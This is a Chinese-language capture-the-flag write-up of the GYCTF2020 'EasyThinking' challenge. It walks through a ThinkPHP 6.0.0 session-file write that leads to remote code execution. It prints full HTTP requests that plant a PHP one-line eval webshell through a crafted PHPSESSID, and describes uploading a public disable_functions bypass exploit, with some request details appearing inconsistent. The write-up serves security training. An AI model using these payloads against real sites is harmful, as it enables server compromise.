[GYCTF2020]EasyThinking
输入url:
/1
页面报错,提示:ThinkPHP V6.0.0 { 十年磨一剑-为API开发设计的高性能框架 } - 官方手册。
用dirsearch扫描发现www.zip源码泄露,使用命令:
python dirsearch.py -u http://be2eaad1-b1cd-496a-9992-e5b410121b55.node4.buuoj.cn:81/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
-w参数表示使用自定义字典。审计下载的源码,找到app\home\controller\Member.php中的search()函数:
public function search()
{
if (Request::isPost()){
if (!session('?UID'))
{
return redirect('/home/member/login');
}
$data = input("post.");
$record = session("Record");
if (!session("Record"))
{
session("Record",$data["key"]);
}
else
{
$recordArr = explode(",",$record);
$recordLen = sizeof($recordArr);
if ($recordLen >= 3){
array_shift($recordArr);
session("Record",implode(",",$recordArr) . "," . $data["key"]);
return View::fetch("result",["res" => "There's nothing here"]);
}
}
session("Record",$record . "," . $data["key"]);
return View::fetch("result",["res" => "There's nothing here"]);
}else{
return View("search");
}
}
这个函数会把搜索框POST数据存到session文件里面,生成的session文件名规则即为sess_PHPSESSID。默认状态下 PHPSESSID 的长度为32个字符。
在vendor\topthink\framework\src\think\session\driver\File.php文件下,找到Session 文件驱动:
public function __construct(App $app, array $config = [])
{
$this->config = array_merge($this->config, $config);
if (empty($this->config['path'])) {
$this->config['path'] = $app->getRootPath() . 'runtime' . DIRECTORY_SEPARATOR . 'session' . DIRECTORY_SEPARATOR;
} elseif (substr($this->config['path'], -1) != DIRECTORY_SEPARATOR) {
$this->config['path'] .= DIRECTORY_SEPARATOR;
}
$this->init();
}
说明session文件存在/runtime/session/目录下。注册后,搜索<?php phpinfo(); ?>时拦截请求,修改为:
POST /home/member/search HTTP/1.1
Host: 7e79368d-87d9-4ac2-aa0b-dbc00cc3f8b3.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1234567891234567891234567890.php
Connection: close
Content-Length: 23
key=<?php phpinfo(); ?>
发送请求后,请问文件输入url:
/runtime/session/sess_1234567891234567891234567890.php
类似这一题:[极客大挑战 2019]RCE ME,在phpinfo页面可以看到disable_functions。所以我们考虑绕过disable_functions。再次上传一句话木马:
POST /home/member/search HTTP/1.1
Host: 7e79368d-87d9-4ac2-aa0b-dbc00cc3f8b3.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1234567891234567891234567890.php
Connection: close
Content-Length: 23
key=<?php @eval($_POST["cmd"]);?>
利用蚁剑空白区域右击添加数据,设置如下:
URL地址 http://0c3b01c2-b1c6-4230-8940-13c54d50a157.node4.buuoj.cn:81/runtime/session/sess_1234567891234567891234567890.php
连接密码 cmd
网站备注
编码设置 UTF8
连接类型 PHP
其他不变。密码可以随便设置,要跟$_POST["cmd"]
一致。
下载绕过disable_functions的脚本:
GitHub - mm0r1/exploits: Pwn stuff.
选择php7-gc-bypass/文件夹下的exploit.php,第十一行改为pwn("/readflag");,然后用蚁剑上传到服务器/var/tmp/目录下,刷新一下就可以看到已经上传成功。
POST /home/member/search HTTP/1.1
Host: 7e79368d-87d9-4ac2-aa0b-dbc00cc3f8b3.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1234567891234567891234567890.php
Connection: close
Content-Length: 23
cmd=<?php include("/var/tmp/exploit.php") ?>
输入url:
/runtime/session/sess_1234567891234567891234567890.php
得到flag。
References